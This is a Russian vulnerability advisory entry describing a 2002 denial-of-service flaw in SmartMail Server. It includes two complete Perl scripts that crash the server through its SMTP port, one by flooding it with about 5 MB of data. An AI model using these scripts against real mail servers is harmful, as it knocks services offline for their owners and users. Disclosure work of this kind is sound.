| Дата публикации: | 01.11.2002 |
| Всего просмотров: | 1261 |
| Опасность: | Низкая |
| Наличие исправления: | Нет |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Удаленная |
| Воздействие: | Отказ в обслуживании |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: |
SmartMail Server 1
SmartMail Server 2 |
| Описание: | SmartMail Server ( 1. Закрытие подключения во время передачи данных вызовет ошибку "Access violations at address 0046CBCC i module 'smartsvr.exe' write of address 76756f4e ". Эксплоит:
#!/usr/bin/perl -w
# greetz: marocit and #crack.fr (christal)
# securma@caramail.com
use Socket;
if (not $ARGV[0]) {
print qq~
Usage: sm.pl <host>
~;
exit;}
$ip=$ARGV[0];
print "SmartMail server 2.0 DoS\n\n";
print "Sending Exploit Code to host: " . $ip . "\n\n";
sendexplt("MASSINE");
sub sendexplt {
my ($pstr)=@_;
$target= inet_aton($ip) || die("inet_aton
problems");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')
||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,25,$target)){
select(S);
$|=1;
print $pstr;
sleep 3;
close(S);
} else { die("Can't connect...\n"); }
}
2. Посылка 5MG of dated к 25 и 110 порту приведет к завершению работы всех служб (pop/smtp/webinterface).
#!/usr/bin/perl -w
# tool smartdos.pl
# securma@caramail.com
# Greetz: marocit and #crack.fr (specialement christal.)
#
use IO::Socket;
if ($#ARGV<0)
{
print "\n write the target IP!\n\n";
exit;
}
$buffer = "A"x 5099999 ;
$connect = IO::Socket::INET ->new (Proto=>"tcp",
PeerAddr=> "$ARGV[0]",
PeerPort=>"25"); unless ($connect) { die "cant connect $ARGV
[0]" }
print $connect "$buffer";
print "\nsending exploit......\n\n";
|
| Ссылки: | SmartMail server DOS |